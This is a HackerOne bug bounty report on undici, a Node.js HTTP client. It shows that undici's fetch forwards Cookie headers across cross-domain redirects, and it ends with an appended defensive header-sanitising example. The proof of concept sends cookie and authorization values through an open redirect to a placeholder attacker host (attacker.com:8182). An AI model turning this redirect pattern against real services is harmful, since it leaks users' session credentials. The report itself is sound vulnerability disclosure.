HackerOne report 2243710 (ranjit_p), Nov 07, 2023 - 3:47 p.m.

Internet Bug Bounty: Cookie headers are not cleared in cross-domain redirect in undici-fetch

2023-11-07 15:47:49
ranjit_p
hackerone.com
$405
17
undici
cross-domain redirect
cookie leak
security advisory
bugbounty

AI Score: 6.8
Confidence: Low
EPSS: 0.012
Percentile: 85.7%

AFFECTED MODULE

undici v5.24.0

STEPS TO REPRODUCE

I read this security advisory: https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp .
It says sensitive headers like cookie and Authorization are properly cleared during cross-domain redirect.
So, I installed the undici module and tried to reproduce the above:

import { request } from 'undici'

// Request through a redirecting endpoint on one host to a listener on another.
// Note the mixed-case header names.
const {
  statusCode,
  headers,
  trailers,
  body
} = await request('http://anysite.com/redirect.php?url=http://attacker:8182', {
  maxRedirections: 3,
  headers: {
    autHorization: 'test',
    cookie: "ddd=dddd"
  }
})

console.log('response received', statusCode)
console.log('headers', headers)

for await (const data of body) {
  console.log('data', data)
}

This properly clears the authorization and cookie headers during cross-domain redirect.

Now I tried with undici-fetch and it failed to clear the cookie header during cross-domain redirect:

import { fetch } from 'undici'

// Same shape of request, this time through undici's fetch implementation.
const res = await fetch('http://anysite.com/redirect.php?url=http://attacker.com:8182/vvv', {
  maxRedirections: 3,
  headers: {
    AutHorization: 'test',
    Cookie: "ddd=dddd"
  }
})
const json = await res.json()
console.log(json)

Here http://attacker.com:8182/ will receive the above cookie.

Impact

cross-domain cookie leak
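The report shows two client code paths reaching different decisions about which headers survive a redirect. The following is an added example, not undici's code and not part of the report, of the check a redirect-following client is expected to apply: drop credential headers whenever the redirect target is a different origin (scheme, host and port, as in the fetch specification), and match header names case-insensitively, since the report's PoC sends them as `AutHorization` and `Cookie`. The function and header names (`sanitizeRedirectHeaders`, `leakedCredentialHeaders`, `ORIGIN_BOUND_HEADERS`) are assumptions introduced here; the URLs reuse the report's placeholders.

```javascript
// Added example: redirect header sanitisation as a defender-side check.
// Not undici's implementation; names below are assumptions for illustration.

// Request headers that carry credentials for one origin and must never be
// forwarded to a different origin when a redirect is followed.
const ORIGIN_BOUND_HEADERS = new Set(['authorization', 'cookie', 'proxy-authorization']);

// Fetch-spec "same origin": scheme, host and port all equal.
// URL.origin normalises default ports, so http://a.com/ and http://a.com:80/ match.
function sameOrigin(fromUrl, toUrl) {
  return new URL(fromUrl).origin === new URL(toUrl).origin;
}

// Returns a copy of `headers` as they should be sent to `toUrl` after a redirect
// from `fromUrl`. Credential headers are removed on a cross-origin redirect; the
// Host header is always removed because it must be recomputed for the new URL.
// Header names are compared case-insensitively (HTTP header names are).
function sanitizeRedirectHeaders(headers, fromUrl, toUrl) {
  const crossOrigin = !sameOrigin(fromUrl, toUrl);
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (lower === 'host') continue;
    if (crossOrigin && ORIGIN_BOUND_HEADERS.has(lower)) continue;
    out[name] = value;
  }
  return out;
}

// Given the headers a redirect target actually received (e.g. logged by a test
// listener you control), return the credential header names that leaked.
// An empty array means the client behaved correctly.
function leakedCredentialHeaders(receivedHeaders) {
  return Object.keys(receivedHeaders)
    .map((h) => h.toLowerCase())
    .filter((h) => ORIGIN_BOUND_HEADERS.has(h))
    .sort();
}

// Constructed sample mirroring the report's PoC: mixed-case credential headers,
// redirect from one host to another host and port.
const poCHeaders = { AutHorization: 'test', Cookie: 'ddd=dddd', Accept: 'application/json' };
const fromUrl = 'http://anysite.com/redirect.php?url=http://attacker.com:8182/vvv';
const toUrl = 'http://attacker.com:8182/vvv';

console.log('cross-origin, sent:', sanitizeRedirectHeaders(poCHeaders, fromUrl, toUrl));
console.log('same-origin, sent:', sanitizeRedirectHeaders(poCHeaders, fromUrl, 'http://anysite.com/other'));
// What a broken client would have sent is exactly the original headers; the
// checker flags both credential headers in that case.
console.log('leaked by a broken client:', leakedCredentialHeaders(poCHeaders));
```

To use `leakedCredentialHeaders` as a regression check, point the redirect at a listener you operate, record the request headers it receives, and assert the returned array is empty; the same-origin branch confirms the check does not strip headers on a redirect that stays within one origin.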